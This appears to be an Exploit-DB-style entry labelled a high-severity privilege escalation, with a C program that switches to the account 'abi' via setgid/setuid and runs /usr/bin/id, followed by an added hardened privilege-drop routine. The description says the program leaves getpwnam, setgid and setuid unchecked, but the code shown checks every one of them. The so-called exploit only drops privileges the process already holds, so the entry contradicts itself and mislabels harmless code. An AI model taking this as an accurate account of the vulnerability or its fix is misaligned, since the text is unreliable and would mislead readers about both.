CVSS: 7.5 (HIGH)
CWE: 269 (Privilege Escalation)

Privilege Escalation via setgid and setuid functions

This exploit uses the setgid and setuid functions to change the identity of the running process. The program first looks up the account 'abi' in the system's password database with getpwnam, then sets the process's group ID and user ID to those of 'abi'. Finally it runs '/usr/bin/id' through popen and prints the output, which shows the identity the process now holds. The identity switch only succeeds when the program already runs with sufficient privilege (as root, or as a setuid-root binary); in that case an attacker who can run it executes commands as the 'abi' user. Note that the program checks neither the result of getpwnam (NULL if the account does not exist, which would crash the process when pw is dereferenced) nor the return values of setgid and setuid, so a failed switch goes unnoticed and the command still runs with the original privileges.

Mitigation:

To mitigate this vulnerability, only run such programs as root or install them setuid-root when strictly necessary, validate any input that selects the target account, and treat setgid and setuid as privileged operations: check the result of getpwnam and the return values of setgid and setuid, and abort rather than continue to execute commands if the identity change fails. Additionally, regularly update and patch the system to address any potential vulnerabilities.

Exploit-DB raw data:

#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    struct passwd *pw;
    FILE *pipe;
    char buf[25];

    /* Look up the target account; getpwnam() returns NULL if it does not exist. */
    pw = getpwnam("abi");
    if (pw == NULL) {
        fprintf(stderr, "user 'abi' not found\n");
        return 1;
    }

    /* Group first, then user: once the uid is non-root the gid can no longer
       be changed. Both calls need root (or a setuid-root binary); check them. */
    if (setgid(pw->pw_gid) != 0) {
        perror("setgid");
        return 1;
    }
    if (setuid(pw->pw_uid) != 0) {
        perror("setuid");
        return 1;
    }

    printf("my gid: %u\n", (unsigned) getegid());
    printf("my uid: %u\n", (unsigned) getuid());

    /* Run id(1) under the new identity and echo its output. */
    pipe = popen("/usr/bin/id", "r");
    if (pipe == NULL) {
        perror("popen");
        return 1;
    }
    while (fgets(buf, sizeof buf, pipe)) {
        printf("%s", buf);
    }
    printf("\n");
    pclose(pipe);
    return 0;
}
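A hardened version of the same identity switch, added here as an example and not part of the Exploit-DB entry: every step is checked, supplementary groups inherited from root are cleared, the gid is set before the uid, and the routine proves afterwards that root cannot be regained. The function names, the result codes and the default account 'nobody' are this example's own assumptions.

```c
#define _GNU_SOURCE   /* declares setgroups() in <grp.h> on glibc and musl */
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Outcome of drop_to_user(); every step of the switch is checked. */
enum drop_result {
    DROP_OK = 0,
    DROP_NO_SUCH_USER,      /* getpwnam() found no such account */
    DROP_NOT_PRIVILEGED,    /* not running as root: nothing to switch */
    DROP_SETGROUPS_FAILED,
    DROP_SETGID_FAILED,
    DROP_SETUID_FAILED,
    DROP_STILL_PRIVILEGED   /* root could be regained after the switch */
};

/* Permanently switch the process to the account `name` (hypothetical helper).
 * Order matters: clear supplementary groups and set the gid while still root,
 * set the uid last, then verify the switch cannot be undone. */
enum drop_result drop_to_user(const char *name)
{
    struct passwd *pw = getpwnam(name);
    if (pw == NULL)
        return DROP_NO_SUCH_USER;
    if (geteuid() != 0)
        return DROP_NOT_PRIVILEGED;

    /* Supplementary groups inherited from root would otherwise survive. */
    if (setgroups(0, NULL) != 0)
        return DROP_SETGROUPS_FAILED;
    /* gid before uid: once the uid is non-root, setgid() would fail. */
    if (setgid(pw->pw_gid) != 0)
        return DROP_SETGID_FAILED;
    /* setuid() called as root sets real, effective and saved uid together. */
    if (setuid(pw->pw_uid) != 0)
        return DROP_SETUID_FAILED;

    /* Regaining root must now fail; if it succeeds, the saved uid was left
     * at 0 and the "drop" is only cosmetic. */
    if (pw->pw_uid != 0 && setuid(0) == 0)
        return DROP_STILL_PRIVILEGED;
    return DROP_OK;
}

/* Human-readable name for a drop_result, for logging. */
const char *drop_result_str(enum drop_result r)
{
    static const char *names[] = {
        "ok", "no such user", "not privileged", "setgroups failed",
        "setgid failed", "setuid failed", "still privileged"
    };
    return ((unsigned) r <= DROP_STILL_PRIVILEGED) ? names[r] : "unknown";
}

/* Stand-alone use: ./drop <account>. Prints the identity it ends up with. */
int main(int argc, char **argv)
{
    /* "nobody" is assumed to exist on the host when no account is given. */
    const char *target = argc > 1 ? argv[1] : "nobody";
    enum drop_result r = drop_to_user(target);
    if (r != DROP_OK) {
        fprintf(stderr, "drop to %s failed: %s (errno %d)\n",
                target, drop_result_str(r), errno);
        return 1;
    }
    printf("uid=%u euid=%u gid=%u egid=%u\n",
           (unsigned) getuid(), (unsigned) geteuid(),
           (unsigned) getgid(), (unsigned) getegid());
    return 0;
}
```

The final setuid(0) probe is the part the original program lacks entirely: it turns a silent partial drop (effective uid changed, saved uid still 0) into a hard failure instead of letting the program go on to run commands.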